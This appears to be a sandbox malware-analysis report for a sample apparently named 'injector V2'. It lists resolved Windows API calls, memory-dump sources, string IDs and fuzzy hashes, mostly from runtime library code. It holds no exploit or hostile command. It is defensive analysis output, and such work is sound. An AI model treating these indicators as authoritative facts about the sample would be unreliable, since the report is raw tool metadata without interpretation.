                                                                                    • API ID: H_prolog3_std::domain_error::domain_errorstd::exception::exception
                                                                                    • String ID: CDM$CDM
                                                                                    • API String ID: 2144476180-485079685
                                                                                    • Opcode ID: 3ad606987db4f01221addf43c48e5a879bcb0d27de4e264f314810438f91d461
                                                                                    • Instruction ID: 4bff465f5eb52eb7ce5761ed7c8a2ee6cc614f300affc1cc6247d18b11eb4bda
                                                                                    • Opcode Fuzzy Hash: 3ad606987db4f01221addf43c48e5a879bcb0d27de4e264f314810438f91d461
                                                                                    • Instruction Fuzzy Hash: 80014070D00208ABCF18EF6AD85589EBBF4EF88308750842FE41597341DB34D605CB94
                                                                                    APIs
                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004DC8CB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: 33f17a07e41206ec0681318bff4c4289635caeb806237dcbe8a91e356e0334a5
                                                                                    • Instruction ID: 64189fd60649195154ed58b3f198143f922151e4aef40f55bf3f860ddcc30306
                                                                                    • Opcode Fuzzy Hash: 33f17a07e41206ec0681318bff4c4289635caeb806237dcbe8a91e356e0334a5
                                                                                    • Instruction Fuzzy Hash: A871F571C0511E6EDF21EF258CE9AAAB7B9EB05304F1441DBE00997341DB388E85DF58
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004D5450
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 004D551C
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004D553C
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 004D5546
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    • Opcode ID: ae9cb73bf17c5725b4a7045f5ca161cd8a8e300073f8c27026a167351e5c2d87
                                                                                    • Instruction ID: 69f1da8a81cf862c4788b997ecd5a2a7e2fc54ae040378a7f27dd0f9955a80d8
                                                                                    • Opcode Fuzzy Hash: ae9cb73bf17c5725b4a7045f5ca161cd8a8e300073f8c27026a167351e5c2d87
                                                                                    • Instruction Fuzzy Hash: 13312B75D052189BDF11EF64D9897CDBBF8BF08304F1041AAE40DAB291EB745A85CF09
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004D4CB6
                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004D4CC4
                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004D4CD5
                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004D4CE6
                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004D4CF7
                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004D4D08
                                                                                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 004D4D19
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 004D4D2A
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 004D4D3B
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004D4D4C
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004D4D5D
                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004D4D6E
                                                                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004D4D7F
                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004D4D90
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004D4DA1
                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004D4DB2
                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004D4DC3
                                                                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 004D4DD4
                                                                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 004D4DE5
                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 004D4DF6
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 004D4E07
                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 004D4E18
                                                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 004D4E29
                                                                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 004D4E3A
                                                                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 004D4E4B
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004D4E5C
                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 004D4E6D
                                                                                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 004D4E7E
                                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004D4E8F
                                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004D4EA0
                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 004D4EB1
                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 004D4EC2
                                                                                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 004D4ED3
                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 004D4EE4
                                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 004D4EF5
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 004D4F06
                                                                                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 004D4F17
                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 004D4F28
                                                                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 004D4F39
                                                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 004D4F4A
                                                                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 004D4F5B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule
                                                                                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                    • API String ID: 667068680-295688737
                                                                                    • Opcode ID: 9e48169d32f0793e880ee4a777dc8b1453f3e533cecebb8bb738eaa9b28bb6b2
                                                                                    • Instruction ID: 192574652617c92f49ef8a7c5c4538bb6cc259aff928a5a689bb0f197af20edd
                                                                                    • Opcode Fuzzy Hash: 9e48169d32f0793e880ee4a777dc8b1453f3e533cecebb8bb738eaa9b28bb6b2
                                                                                    • Instruction Fuzzy Hash: DE613F71D963D0ABC7406FF5BDCD9C63BA8BB197527110437B101DA2E2DBB864428B6C
                                                                                    APIs
                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 004D91F2
                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 004D9300
                                                                                    • CatchIt.LIBVCRUNTIME ref: 004D9351
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 004D9452
                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 004D946D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                    • String ID: @]M$csm$csm$csm
                                                                                    • API String ID: 4119006552-3206858408
                                                                                    • Opcode ID: 95262f08eff0074dc906eb95ff9a5eb2b20c52530628183561ecfb02594ac913
                                                                                    • Instruction ID: 89c5baade081c99203d768e5c70df9b452572e8434443e881ca22178d8974cef
                                                                                    • Opcode Fuzzy Hash: 95262f08eff0074dc906eb95ff9a5eb2b20c52530628183561ecfb02594ac913
                                                                                    • Instruction Fuzzy Hash: A1B18971800209EFCF14EFA5C8A19AEB7B5BF08314B14459FE805AB342D739DE52CB99
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004D6167
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 004D616F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004D61F8
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004D6223
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004D6278
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: ^M$csm
                                                                                    • API String ID: 1170836740-306190623
                                                                                    • Opcode ID: 4308eba7da61baa27c6657838a397fca1774a7fcfc2a10b21b4e09af1ff5c974
                                                                                    • Instruction ID: 10bd6fc9a7212e39980a42d61f3ea373bfdf868ed67eeecd2c9a58adf5c45ca1
                                                                                    • Opcode Fuzzy Hash: 4308eba7da61baa27c6657838a397fca1774a7fcfc2a10b21b4e09af1ff5c974
                                                                                    • Instruction Fuzzy Hash: AA411D34A00259ABCF10EF59C8A4A9FBBB0FF05318F15819BE8159B352D739EE05CB94
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                    • String ID:
                                                                                    • API String ID: 127012223-0
                                                                                    • Opcode ID: af91130f4dc08b8bdef5a2de89f33e6bf3495747baace073925149c5c2424c1d
                                                                                    • Instruction ID: 4c9bd532e94a19dc90903c1a54264c28535d37bf30992842d535b7d9bd8cf104
                                                                                    • Opcode Fuzzy Hash: af91130f4dc08b8bdef5a2de89f33e6bf3495747baace073925149c5c2424c1d
                                                                                    • Instruction Fuzzy Hash: FB71F472900285ABDF21DA968C51BAF77B5DF49315F59001BE924A7381E7BCDC808B98
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,004D9EE2,004D41E0,?,00000000,?,?,?,004D9BEB,00000022,FlsSetValue,004E3DDC,004E3DE4,?), ref: 004D9E94
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-$ext-ms-
                                                                                    • API String ID: 3664257935-537541572
                                                                                    • Opcode ID: 784992709298733552a353899b95bcfff69b19da19033d57fbe89209a363e8f7
                                                                                    • Instruction ID: 770c9fc93d4b33e05b572e2e27c8f03cf20dc6b0374f12672536b81e51122f32
                                                                                    • Opcode Fuzzy Hash: 784992709298733552a353899b95bcfff69b19da19033d57fbe89209a363e8f7
                                                                                    • Instruction Fuzzy Hash: 96212731A00251ABCB21DB21DC94B5B7358EF82B60F250127ED06EB3D2DB38ED02C6D8
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 4e43d3bfc18703e0eca92b223dec0a2d07230d006d4571776e3344aae2b6aa3f
                                                                                    • Instruction ID: 486876cd5dbb12a582dd7b38d0c0038bdb39ef043afc23a3380d6a9311272e3e
                                                                                    • Opcode Fuzzy Hash: 4e43d3bfc18703e0eca92b223dec0a2d07230d006d4571776e3344aae2b6aa3f
                                                                                    • Instruction Fuzzy Hash: 10714CB8904209CFCB44DFA9D594BAEBBF0EB48700F10855EE845AB350DB389D458F9A
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,004D8831,004D5F0D,004D55A4), ref: 004D8848
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004D8856
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004D886F
                                                                                    • SetLastError.KERNEL32(00000000,004D8831,004D5F0D,004D55A4), ref: 004D88C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 6ab601a3443cee9fa582e0b2f807bee27aa03698162ac2c14c7dc108ece4e8b7
                                                                                    • Instruction ID: 9176bceb84808072de870b62150700c947d26b1c75e4414f354dacab5f0eaa3f
                                                                                    • Opcode Fuzzy Hash: 6ab601a3443cee9fa582e0b2f807bee27aa03698162ac2c14c7dc108ece4e8b7
                                                                                    • Instruction Fuzzy Hash: 9801B5325192125DEA243B767CE693B2754EB517B8360033FF411493E2EF199C01728D
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,004E25EB,000000FF,?,004D7015,?,?,004D70B1,00000000), ref: 004D6F89
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00000000,004E25EB,000000FF,?,004D7015,?,?,004D70B1,00000000), ref: 004D6F9B
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,004E25EB,000000FF,?,004D7015,?,?,004D70B1,00000000), ref: 004D6FBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: 8d2f6318bf9beaaf834a02cfa12e6da906b89cc11e7c4e01927bcbd9feb7418a
                                                                                    • Instruction ID: 4a01f7c523013e165e98b9df6da663835d7e6ffc091c66b915d5d144e15672f0
                                                                                    • Opcode Fuzzy Hash: 8d2f6318bf9beaaf834a02cfa12e6da906b89cc11e7c4e01927bcbd9feb7418a
                                                                                    • Instruction Fuzzy Hash: 2C01A2319086A9ABCB018F55DC49FEEB7B8FB04B15F05052AE811A63D0DBB89900CA98
                                                                                    APIs
                                                                                    • __alloca_probe_16.LIBCMT ref: 004DDFA2
                                                                                    • __alloca_probe_16.LIBCMT ref: 004DE06B
                                                                                    • __freea.LIBCMT ref: 004DE0D2
                                                                                      • Part of subcall function 004DBC45: HeapAlloc.KERNEL32(00000000,?,00000000,?,004D41E0,?,?,004D1007,?,004CFAB5), ref: 004DBC77
                                                                                    • __freea.LIBCMT ref: 004DE0E5
                                                                                    • __freea.LIBCMT ref: 004DE0F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1096550386-0
                                                                                    • Opcode ID: a298428f71cab72bf663df0e6a42fc9440037166a428b6f1a077d68c67c59853
                                                                                    • Instruction ID: 321caedbbc9571ece6527a998a3fb259eea789f67700acce592e7c6f655bd0c5
                                                                                    • Opcode Fuzzy Hash: a298428f71cab72bf663df0e6a42fc9440037166a428b6f1a077d68c67c59853
                                                                                    • Instruction Fuzzy Hash: ED51B472600216AFDB226F63CC65EBB76A9EF44B14B15402FFD05DA301EB79DC50C6A8
                                                                                    APIs
                                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,004D93FE,?,?,00000000,00000000,00000000,?), ref: 004D951D
                                                                                    • CatchIt.LIBVCRUNTIME ref: 004D9603
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CatchEncodePointer
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 1435073870-2084237596
                                                                                    • Opcode ID: b082105b1ad211543b27f14a1b71501a9fe945d743bdd10c45cfb8e7fe69ab2f
                                                                                    • Instruction ID: 52d48338e1b31320b0ecf6a1f129548d9c42b0c4fc67e9957cbf98f3f1063602
                                                                                    • Opcode Fuzzy Hash: b082105b1ad211543b27f14a1b71501a9fe945d743bdd10c45cfb8e7fe69ab2f
                                                                                    • Instruction Fuzzy Hash: F3414972900209AFCF16DF94D991AAE7BB5EF48304F18406BF905AA311D739DD50DB58
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,004DDCFA,00000000,?,004ECCD0,?,?,?,004DDC31,00000004,InitializeCriticalSectionEx,004E46F8,004E4700), ref: 004DDC6B
                                                                                    • GetLastError.KERNEL32(?,004DDCFA,00000000,?,004ECCD0,?,?,?,004DDC31,00000004,InitializeCriticalSectionEx,004E46F8,004E4700,00000000,?,004D971C), ref: 004DDC75
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 004DDC9D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2088403836.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088441225.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088456416.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088473187.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2088491312.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3177248105-2084034818
                                                                                    • Opcode ID: a3736c332924439d333baa1c2a4a3637210af519623b6b899411df2deeb86aaf
                                                                                    • Instruction ID: 44374c02eb2bd29e932f499b1306acda0c543dee709844be0b252aa86680e9dd
                                                                                    • Opcode Fuzzy Hash: a3736c332924439d333baa1c2a4a3637210af519623b6b899411df2deeb86aaf
                                                                                    • Instruction Fuzzy Hash: 63E01230654249BAEF112B51DC46B593B55AB01F55F104036F94DA82E1EBA69C11C54C
                                                                                    APIs
                                                                                    • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 004DE64B
                                                                                      • Part of subcall function 004DD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,004D87B1,?,00000000,?), ref: 004DD192
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004DE89D
                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004DE8E3
                                                                                    • GetLastError.KERNEL32 ref: 004DE986
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2088419718.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
